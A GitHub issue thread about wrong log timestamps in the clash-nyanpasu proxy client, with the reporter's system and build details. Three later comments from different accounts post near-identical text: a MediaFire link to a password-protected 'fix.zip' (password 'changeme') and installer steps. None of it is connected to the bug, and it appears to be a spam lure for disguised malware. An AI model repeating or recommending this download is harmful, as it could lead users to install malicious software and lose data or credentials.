### ISSUE TITLE
日志模块纪录时间不对

### ISSUE THREAD

**Issue by easyinplay** [libnyanpasu/clash-nyanpasu#1447]
### 复现步骤 / Step to reproduce

打开日志模块，查看最新日志的记录时间是不对的

![image](https://github.com/user-attachments/assets/3ba3e982-3132-49f3-9acd-49af16b7037a)

### 预期行为 / Expected behaviour

预期应该是能和系统时间对上的

### 实际行为 / Actual Behaviour

实际上和右下角系统时间对不上

![image](https://github.com/user-attachments/assets/5036e78d-f47f-47f1-8011-7a44ec257a61)

### 应用日志 / App logs

[2024-08-28-log.zip](https://github.com/user-attachments/files/16777939/2024-08-28-log.zip)

### 环境信息 / Environment information

> ----------- System -----------
> OS: Windows 11 Pro for Workstations 27686
> Arch: x86_64
> ----------- Device -----------
> CPU: Intel(R) Core(TM) i5-9400 CPU @ 2.90GHz @ 2.90GHz x 6
> Memory: 31.87 GiB
> ----------- Core -----------
> mihomo: `Mihomo Meta v1.18.7 windows amd64 with go1.22.5 Sun Jul 28 05:48:59 UTC 2024 Use tags: with_gvisor`
> clash: `Clash n2023-09-05-gdcc8d87 windows amd64 with go1.21.0 Tue Sep  5 14:32:57 UTC 2023`
> clash-rs: `clash-rs 0.3.0`
> mihomo-alpha: `Mihomo Meta alpha-8483178 windows amd64 with go1.23.0 Tue Aug 27 12:36:46 UTC 2024 Use tags: with_gvisor`
> ----------- Build Info -----------
> App Name: clash-nyanpasu
> App Version: 0.1.0
> Pkg Version: 1.5.2-alpha+08bbf03
> Commit Hash: 08bbf0322d8d91a4184fe3f8e05f5abc9d7280f2
> Commit Author: github-actions[bot]
> Commit Date: 2024-08-27T22:20:49.000Z
> Build Date: 2024-08-28T00:41:17.228Z
> Build Profile: Nightly
> Build Platform: x86_64-pc-windows-msvc
> Rustc Version: rustc 1.82.0-nightly (515395af0 2024-08-26)
> Llvm Version: 19.1
> 

### 自查步骤 / Verify steps

- [ ] 如果您有足够的时间和能力，并愿意为此提交 PR ，请勾上此复选框 / Pull request is welcome. Check this if you want to start a pull request
- [X] 您已知悉如果没有提供正确的系统信息，以及日记，您的 Issue 会直接被关闭 / You have known that if you don't provide correct system information and logs, your issue will be closed directly
- [X] 您已仔细查看并知情 [Q&A](https://nyanpasu.elaina.moe/zh-CN/others/issues.html) 和 [FAQ](https://nyanpasu.elaina.moe/zh-CN/others/faq.html) 中的内容 / You have read and understood the contents of [Q&A](https://nyanpasu.elaina.moe/others/issues.html) and [FAQ](https://nyanpasu.elaina.moe/others/faq.html).
- [X] 您已搜索过 [Issue Tracker](https://github.com/keiko233/clash-nyanpasu/issues)，没有找到类似内容 / I have searched on [Issue Tracker](https://github.com/keiko233/clash-nyanpasu/issues), No duplicate or related open issue has been found
- [X] 您确保这个 Issue 只提及一个问题。如果您有多个问题报告，烦请发起多个 Issue / Ensure there is only one bug report in this issue. Please make mutiply issue for mutiply bugs
- [X] 您确保已使用最新 Pre-release 版本测试，并且该问题在最新 Pre-release 版本中并未解决 / This bug have not solved in latest Pre-release version

**Comment by bkballoon** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by easyinplay** [comment]
> Download https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file password: changeme In the installer menu, select "gcc."

你好，这个是什么修改时区的吗？这个能修正clash的时间？

**Comment by NEKO-JOJUK** [comment]
to fix your trouble check this fix, i see it in another issue,
https://app.mediafire.com/9mrkd33xulszl
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by qiliq** [comment]
to fix your trouble check this fix, i see it in another issue,
https://app.mediafire.com/9mrkd33xulszl
password: changeme
when you installing, you need to place a check in install to path and select "gcc."
